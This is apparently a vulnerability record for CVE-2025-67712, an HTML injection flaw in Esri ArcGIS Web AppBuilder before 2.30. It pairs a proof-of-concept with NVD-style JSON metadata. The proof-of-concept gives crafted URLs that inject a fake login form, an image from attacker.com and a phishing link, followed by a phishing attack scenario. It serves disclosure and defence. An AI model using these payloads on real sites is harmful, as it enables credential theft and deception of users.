CVE-2025-67712

<!-- HTML Injection PoC for CVE-2025-67712 --> <!-- Attacker crafts a malicious URL with HTML injection payload --> <!-- Example 1: Basic HTML injection via URL parameter --> <a href="http://target-arcgis-server/webappbuilder/?param=<h1>Hacked</h1><p>Your session has expired. Please login again:</p><form><input type='text' placeholder='Username'><input type='password' placeholder='Password'><button>Login</button></form>">Click here to access the map</a> <!-- Example 2: Image injection to deface page --> <a href="http://target-arcgis-server//webappbuilder/?returnUrl=<img src='https://attacker.com/malicious-banner.png' width='100%'/>">View Application</a> <!-- Example 3: Link injection to redirect users --> <a href="http://target-arcgis-server/webappbuilder/?redirect=<a href='https://attacker- phishing-site.com'>Click here for special offer</a>">Open Map</a> <!-- Attack scenario: --> <!-- 1. Attacker identifies vulnerable ArcGIS Web AppBuilder instance --> <!-- 2. Attacker crafts HTML injection payload --> <!-- 3. Attacker sends phishing email with malicious link --> <!-- 4. Victim clicks link and views rendered HTML in browser --> <!-- 5. Victim may be tricked into entering credentials or trusting fake content -->

{"cve": {"id": "CVE-2025-67712", "sourceIdentifier": "[email protected]", "published": "2025-12-19T20:15:55.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "There is an HTML injection issue in Esri ArcGIS Web AppBuilder developer edition versions prior to 2.30 that allows a remote, unauthenticated attacker to potentially entice a user to click a link that causes arbitrary HTML to render in a victim's browser. There is no evidence of JavaScript execution, which limits the impact. At the time of submission, ArcGIS Web App Builder developer edition is retired and unsupported. ArcGIS Web App Builder 2.30 is not susceptible to this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://support.esri.com/en-us/knowledge-base/deprecation-arcgis-web-appbuilder-000036340", "source": "[email protected]"}, {"url": "https://www.mdronski.pl/2026/01/CVE-2025-67712-Proof-of-concept-and-technical-analysis.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}